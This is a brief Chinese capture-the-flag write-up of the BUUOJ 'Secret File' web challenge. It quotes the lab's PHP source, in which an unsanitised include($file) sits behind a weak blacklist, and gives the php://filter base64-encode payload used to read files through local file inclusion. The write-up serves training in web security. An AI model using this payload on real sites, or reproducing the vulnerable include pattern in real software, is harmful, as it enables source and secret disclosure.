[极客大挑战 2019]Secret File
0X01考点
php的file伪协议读取文件
?file=php://filter/convert.base64-encode/resource=
0X02解题过程
bp开启,有页面跳转,然后访问
/secr3t.php
出现了源代码
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag
../目录穿越,等等都被过滤,维度没有过滤file读取
就直接用file伪协议读取就好了
![BUUOJ [极客大挑战 2019]Secret File](https://image.miaokee.com:8440/aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMTQ5NzEzNi8yMDIwMDQvMTQ5NzEzNi0yMDIwMDQxNDIzMzcxNzg2My00OTI1OTExNTEucG5n.png?w=700&webp=1 "BUUOJ [极客大挑战 2019]Secret File")
然后base64解密就ok了
0X03感想
还是要加油啊,争取每天四篇博客!